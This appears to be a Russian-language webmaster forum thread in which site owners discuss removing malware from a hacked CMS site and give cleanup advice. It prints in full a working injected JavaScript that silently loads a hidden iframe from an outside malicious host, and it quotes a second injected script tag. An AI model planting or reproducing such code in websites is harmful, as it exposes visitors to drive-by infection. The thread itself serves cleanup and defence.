Вирус на сайте

нет не удалять, надо знать что удалять а что нет

подозрительными могут быть не только вредоносные коды, но и вполне нормальные, которые использовал разработчик движка

ай-болит лишь предупреждает о возможном вредоносном, решить опасен этот код или нет должен сам пользователь

незнаючи можно половину движка удалить :) или потерять часть функционала...

Непосредственно Яндекс присылал в переписки вот этот фрагмент:

(function(){

function stripos (f_haystack, f_needle, f_offset) {

var haystack = (f_haystack + '').toLowerCase();

var needle = (f_needle + '').toLowerCase();

var index = 0;

if ((index = haystack.indexOf(needle, f_offset)) !== -1) {

return index;

}

return false;

}

function nnn_action(){

var fuuuSpect = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMobile','SymbianOS','Chromium','Firefox/18.0','Firefox/18.0.1','Firefox/17.0','Firefox/12.0','Firefox/25.0','Firefox/24.0','Firefox/18.0.2','Firefox/19.0','Firefox/19.0.1','Firefox/20.0','Firefox/21.0','Firefox/22.0','Firefox/23.0','Firefox/25.0.1','Firefox/26.0','Firefox/27.0','Firefox/28.0'];

var fuuuuuAC = false;

for (var i in fuuuSpect) {

if (stripos(navigator.userAgent, fuuuSpect)) {
fuuuuuAC = true;
break;
}
}
return fuuuuuAC;
}
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!nnn_action()) {
var cookie = getCookie('bibi3ka09sp34er12sk88y');
if (cookie == undefined) {
setCookie('bibi3ka09sp34er12sk88y', true, 86400);
document.write('<'+'ifr'+'ame'+' src='+'"http://gdefly.machio.com.ar/htjykhk5.html" style="position:absolute;left:'+'-'+'1500px;top:'+'-'+'1500px;" height="200" width="200"></iframe>');
}
}
})();

//YOOtheme

Как считаете, что за код?

---------- Добавлено 18.03.2014 в 12:42 ----------

Плохой это код

Правильно я понимаю, что его нужно удалить целиком? (т.е. не фрагмент из него)

надо удалить как минимум тот код, где iframe собирается - 99.9% что именно через него вирус и приходит.

... document.write('<'+'ifr'+'ame'+' src='+'"http://gdefly.machio.com.ar/htjykhk5.html" ... - вот он.

но это только пол-решения - надо искать, как этот код попал на сайт.

Иначе этот код можно будет удалять 100 раз на день.

Система долго не обновлялась, на текущий момент последняя версия.

Предпринял все возможное:

- Проверял комп на вирусы

- Обновил CMS до последней сборки

- Сменил все пароли на хостинге

- Вычистил с помощью ai-bolit файлы с неизвестным содержанием, но остался тот фрагмент, который Яндекс постоянно присылает в переписке.

есть подозрение, что качнули "бесплатный" шаблон с вшитой заразой - первым делом в папке шаблона проверяйте. если есть архив с ним, то сортируйте файлы по дате изменения и смотрите код + папку с картинками проверьте. т.к. есть варианты залива шела в графический файл, типа social.png

В любом случае надо искать, откуда этот iframe берётся. Он или в файлах сайта, или в базе. Возможно еще каким-то посторонним включением генерируется - тогда надо найти, через что именно.

Хотя бы grep-ом пройтись по сайту, вдруг видно будет.

И кеш сайта не забыть очистить :) а то может заразы уже и нет, а в кеше ещё зловред остался.

Обновление и актуализация - очень верно и правильно.

Сайт на DLE 9,8 взломали аж до базы mysql добрались гады, на всех статьях лишние коды наподобие <script type="text/javascript" async="async" src="http://gooogle-webmasters.ru/js/8f14e45fceea167a5a36dedd4bea2543.js"></script>

Старый вирус, из Бд проще удалять регуляторными выражениями